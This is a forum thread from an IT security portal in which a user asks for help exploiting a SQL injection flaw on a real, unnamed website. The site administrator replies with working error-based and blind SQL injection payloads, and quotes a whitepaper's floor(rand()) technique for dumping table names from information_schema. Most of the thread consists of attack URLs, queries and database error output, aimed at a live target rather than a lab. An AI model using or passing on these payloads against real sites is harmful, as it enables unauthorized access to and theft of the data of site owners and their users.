Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 566
Members: 0
Total: 566
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Help in Sql injection plizz
Post new topic  Reply to topic View previous topic :: View next topic 
Help in Sql injection plizz
PostPosted: Mon Sep 06, 2010 1:48 am Reply with quote
pink_spider
Advanced user
Advanced user
 
Joined: Aug 28, 2010
Posts: 91




Code:
http://www.site.com/index.php?id=2773+order+by+1,2,3,4,5,6--


it is ook'
but UNION fail ) :

Code:
http://www.site.com/index.php?id=2773 UNION all SELECT 1,2,3,4,5,6--


et erroe is :

Code:

Erro ao executar a SQL!
mysql error: [1222: The used SELECT statements have a different number of columns] in EXECUTE(\"SELECT l.*, lo.*, DATE_FORMAT(l.licitacao_data_abertura,\'%d/%m/%Y\') as licitacao_data_abertura FROM swp_licitacoes l inner join swp_secoes lo on l.secoes_id = lo.secoes_id WHERE l.licitacao_id = 2773 UNION all SELECT version(),version(),version(),version(),version(),version()-- LIMIT 18446744073709551615\")


HELP ME PLIZZ

[/code]
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 11:49 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This situation is common - vulnerable GET/POST parameter is used in multiple sql queries with different column count. So if you get count right for first sql query, then second query will still fail.
My suggestion is error-based sql injection:

Code:

http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>1,(SELECT+1+UNION+ALL+SELECT+1),1))


Code:

http://www.site.com/index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))


Some more useful information:

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 9:59 pm Reply with quote
pink_spider
Advanced user
Advanced user
 
Joined: Aug 28, 2010
Posts: 91




Very good! thanks

most my problems are not over!
I injected the second code and it worked! I think ¬ ¬

Code:

http://www.site.com//index.php?id=2772%2b(IF(LENGTH(version())>91,(SELECT+1+UNION+ALL+SELECT+1),1))


most do not show up anything on the page!
did not show the version of sql. fuss was indeed null.

how do I fix this problem?
and if not asking too much. I would like to explain the code I posted!

I thank you!

(Y)
[/code]
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 10:13 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Did you get error message as this:

Code:

Subquery returns more than 1 row


It's blind injection, you can retrieve information one bit at the time.
And you need special software for exploitation, because manual way is too error prone and too time consuming.
If you know php, perl, ruby, java or other programming languages, then it's not hard to write needed script or program.
Or try methods from whitepaper, suggested above, it may give you easier ways to exploitation.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 10:16 pm Reply with quote
pink_spider
Advanced user
Advanced user
 
Joined: Aug 28, 2010
Posts: 91




I can post the website address that contains the vulnerability? or are prohibited by the forum?
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 10:18 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




pink_spider wrote:
I can post the website address that contains the vulnerability? or are prohibited by the forum?

Nope, don't post sensitive information to this forum.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 10:23 pm Reply with quote
pink_spider
Advanced user
Advanced user
 
Joined: Aug 28, 2010
Posts: 91




ok!
Thanks anyway.

in two columns gives error when using ORDER BY

in column No. 6 and No. 26
I selected and up to 500

what happens then?
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Mon Sep 06, 2010 10:29 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Did you read whitepaper I was suggesting?

http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf

Code:

[ 2 ] ERROR-BASED BLIND SQL INJECTION IN MYSQL
At the turn of the last year, Qwazar has got a universal technique of exploitation of Blind SQL Injection vulnerabilities in applications operating under MySQL database from the depths of forum.antichat.ru (I wonder what else can be found in these depths). It should be mentioned that the proposed technique is rather complicated and opaque. Here is an example of applying this universal approach to MySQL>=5.0:

mysql> select 1,2 union select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1
mysql> select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.0.841' for key 1

If the table name is unknown, which is possible for MySQL < 5.0, then one has to use more complex queries based on the function rand(). It means that we will often fail to obtain the necessary data with one http query.
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
...
1 row in set (0.00 sec)
...
mysql> select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);
ERROR 1062 (23000): Duplicate entry '5.0.84:0' for key 1
Here is an example of practical use of the method for database structure restoration:
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
http://server/?id=(1)and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--


Analyze that information and do some local tests at your home computer before going online.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 06, 2010 10:37 pm Reply with quote
pink_spider
Advanced user
Advanced user
 
Joined: Aug 28, 2010
Posts: 91




ook'
thankyou'

Razz
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Help in Sql injection plizz
  www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.157 Seconds